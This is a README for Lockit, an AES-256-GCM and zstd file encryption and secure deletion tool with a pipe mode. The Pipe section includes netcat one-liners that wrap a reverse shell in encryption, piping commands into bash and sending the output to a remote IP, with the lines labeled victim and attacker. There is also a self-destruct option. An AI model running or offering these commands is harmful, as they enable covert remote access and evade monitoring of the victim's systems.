Lockit
🔒⚡ An AES256-GCM and ZSTD encryption suite for file encryption, decryption, and secure DoD 5220.22-M deletion that supports files, directories and stdin-to-stdout pipelines.
Install / Use
/learn @krystianbajno/LockitREADME
Lockit
Lock it, unlock it.
⚡ Blazing fast encryption suite.
./lockit <file> <file2> <dir1> # Process files in default mode (encrypt/decrypt)
./lockit encrypt <file> <file2> <dir1> # Encrypt specific files
./lockit encrypt <file> -p # Encrypt a file with a custom passphrase.
./lockit encrypt <dir> # Encrypt all files in a directory
./lockit decrypt <dir/file> # Decrypt a file or directory
./lockit encrypt <dir> --zipdir # Compress, tar, and encrypt entire directories
./lockit remove/delete/rm/del <dir/file> # Securely delete a file / directory.
./lockit remove <file> <file2> --skip-dod # Skip DoD overwrite passes.
./lockit encrypt --pipe # Process as pipe.
./lockit decrypt --pipe -p # Process as pipe, custom passphrase.
./lockit --encrypt-filenames # Encrypt file names
./lockit --no-encrypt-filenames # Keep file names unchanged
./lockit --self-destruct # Remove Lockit after use
./lockit --no-self-destruct # Retain Lockit after use
Pipe
If --pipe is specified, the program processes the input from stdin and outputs to stdout instead of handling files or directories.
echo "Secret message" | ./lockit encrypt --pipe | ./lockit decrypt --pipe
That way you can encrypt files through IO:
cat plaintext.txt | ./lockit encrypt --pipe > encrypted.enc
Or use it with netcat or other tools.
nc -lvnp 9999 | ./lockit decrypt --pipe
echo "This is a very secret message" | ./lockit encrypt --pipe | nc localhost 9999
You can wrap your reverse shell around it and you'll have it encrypted. Example:
nc -lvnp 9999 | ./lockit decrypt --pipe | bash 2>&1 | ./lockit encrypt --pipe | nc 192.168.50.160 9998 # victim receiving commands
nc -lvnp 9998 | ./lockit decrypt --pipe # attacker receiving output
./lockit encrypt --pipe | nc 192.168.60.244 9999 # attacker sending commands
Mechanismg
- Lockit compresses files using zstd and secures them with AES-256-GCM encryption.
- Lockit provides secure file deletion that follows DoD 5220.22-M standard.
But I have SSD
Yes, although DoD 5220.22-M short wipe is good enough for most cases, due to SSD wear leveling, you won't be able to remove the data fully using software. The best way to handle this is combination of hardware TRIM erase and cryptographic erasure. Encrypt the disk fully and delete the key.
Installation
git clone https://github.com/krystianbajno/lockit
cargo build --release
Customizing Default Settings
To change default settings, simply modify build.rs.
Related Skills
openhue
349.2kControl Philips Hue lights and scenes via the OpenHue CLI.
sag
349.2kElevenLabs text-to-speech with mac-style say UX.
weather
349.2kGet current weather and forecasts via wttr.in or Open-Meteo
tradingview-mcp
682Advanced TradingView MCP Server for AI-powered market analysis. Real-time crypto & stock screening, technical indicators, Bollinger Band intelligence, and candlestick patterns. Works with Claude Desktop & AI assistants. Multi-exchange support (Binance, KuCoin, Bybit+). Open source trading toolkit.
